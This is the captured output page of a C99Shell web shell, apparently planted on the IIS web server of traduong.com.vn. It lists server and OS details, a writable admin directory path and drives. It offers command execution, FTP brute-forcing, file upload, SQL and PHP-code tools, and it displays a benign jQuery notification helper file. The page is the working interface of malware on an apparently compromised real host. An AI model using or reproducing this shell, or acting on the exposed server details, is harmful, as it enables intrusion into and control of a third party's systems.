!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

D:\vhosts\traduong.com.vn\admin.traduong.com.vn\Content\js\   drwxrwxrwx
Free 184.88 GB of 400 GB (46.22%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     noty-cfg.js (1.64 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
//https://notifyjs.jpillora.com/

function msg_success(msg, _elemetId = "", _position = "bottom") {
    if (_elemetId != null && _elemetId != "") {
        $(`#${_elemetId}`).notify(msg, { position: _position, className: "success" });
    }
    else {
        $.notify(msg, { position: _position, className: "success" });
    }
};

function msg_info(msg, _elemetId = "", _position = "bottom") {
    if (_elemetId != null && _elemetId != "") {
        $(`#${_elemetId}`).notify(msg, { position: _position, className: "info" });
    }
    else {
        $.notify(msg, { position: _position, className: "info" });
    }
};

function msg_warning(msg, _elemetId = "", _position = "bottom") {
    if (_elemetId != null && _elemetId != "") {
        $(`#${_elemetId}`).notify(msg, { position: _position, className: "warn" });
    }
    else {
        $.notify(msg, { position: _position, className: "warn" });
    }
};

function msg_error(msg, _elemetId = "", _position = "bottom") {
    if (_elemetId != null && _elemetId != "") {
        $(`#${_elemetId}`).notify(msg, { position: _position, className: "error" });
    }
    else {
        $.notify(msg, { position: _position, className: "error" });
    }
};

function success(msg) {
    msg_success(msg, _elemetId = "", _position = "top-right");
};
function error(msg) {
    msg_error(msg, _elemetId = "", _position = "top-right");
};
function warning(msg) {
    msg_warning(msg, _elemetId = "", _position = "top-right");
};
function cnoty(data, layout = "top-right") {
    $.notify(data[1], { position: layout, className: data[0] ? "success":"error" });
    return data[0];
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.8498 ]--